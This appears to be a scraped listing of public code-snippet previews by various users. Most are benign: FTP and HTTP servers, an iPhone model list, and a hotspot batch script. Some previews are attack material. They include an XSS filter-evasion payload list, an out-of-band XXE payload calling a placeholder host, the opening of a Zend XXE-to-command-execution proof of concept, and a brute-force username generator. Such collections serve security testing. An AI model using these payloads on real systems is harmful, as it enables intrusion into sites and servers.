scturtle

#!/usr/bin/env python2
# coding: utf-8

import os,socket,threading,time
#import traceback

allow_delete = False
local_ip = socket.gethostbyname(socket.gethostname())
local_port = 8888
currdir=os.path.abspath('.')

adamawolf

i386 : iPhone Simulator
x86_64 : iPhone Simulator
arm64 : iPhone Simulator
iPhone1,1 : iPhone
iPhone1,2 : iPhone 3G
iPhone2,1 : iPhone 3GS
iPhone3,1 : iPhone 4
iPhone3,2 : iPhone 4 GSM Rev A
iPhone3,3 : iPhone 4 CDMA
iPhone4,1 : iPhone 4S

joernchen

This turns https://www.sec-consult.com/files/20120626-0_zend_framework_xxe_injection.txt 
into a Remote Command Execution:

NOTE: It relies on the PHP expect module being loaded 
(see http://de.php.net/manual/en/book.expect.php)

joern@vbox-1:/tmp$ cat /var/www/server.php 
<?
    require_once("/usr/share/php/libzend-framework-php/Zend/Loader/Autoloader.php");
    Zend_Loader_Autoloader::getInstance();

JohannesHoppe

<script\x20type="text/javascript">javascript:alert(1);</script>
<script\x3Etype="text/javascript">javascript:alert(1);</script>
<script\x0Dtype="text/javascript">javascript:alert(1);</script>
<script\x09type="text/javascript">javascript:alert(1);</script>
<script\x0Ctype="text/javascript">javascript:alert(1);</script>
<script\x2Ftype="text/javascript">javascript:alert(1);</script>
<script\x0Atype="text/javascript">javascript:alert(1);</script>
'`"><\x3Cscript>javascript:alert(1)</script>        
'`"><\x00script>javascript:alert(1)</script>
<img src=1 href=1 onerror="javascript:alert(1)"></img>

willurd

Each of these commands will run an ad hoc http static server in your current (or specified) directory, available at http://localhost:8000. Use this power wisely.

Discussion on reddit.

Python 2.x

$ python -m SimpleHTTPServer 8000

dergachev

# taken from http://www.piware.de/2011/01/creating-an-https-server-in-python/
# generate server.xml with the following command:
#    openssl req -new -x509 -keyout server.pem -out server.pem -days 365 -nodes
# run as follows:
#    python simple-https-server.py
# then in your browser, visit:
#    https://localhost:4443

import BaseHTTPServer, SimpleHTTPServer
import ssl

shalzz

@echo off
REM    Copyright (C) 2013  
REM	   Shaleen Jain
REM	   [email protected]
REM
REM	   Batch file for creating Wifi Hotspot
if _%1_==_payload_  goto :payload

:getadmin
    echo %~nx0: elevating self

dawn110110

#!/usr/bin/env python
# ftpserver.py
#
#  pyftpdlib is released under the MIT license, reproduced below:
#  ======================================================================
#  Copyright (C) 2007 Giampaolo Rodola' <[email protected]>
#
#                         All Rights Reserved
#
#  Permission to use, copy, modify, and distribute this software and

superkojiman

#!/usr/bin/env python3

'''
NameMash by superkojiman

Generate a list of possible usernames from a person's first and last name. 

https://blog.techorganic.com/2011/07/17/creating-a-user-name-list-for-brute-force-attacks/
'''

staaldraad

--------------------------------------------------------------
Vanilla, used to verify outbound xxe or blind xxe
--------------------------------------------------------------

<?xml version="1.0" ?>
<!DOCTYPE r [
<!ELEMENT r ANY >
<!ENTITY sp SYSTEM "http://x.x.x.x:443/test.txt">
]>
<r>&sp;</r>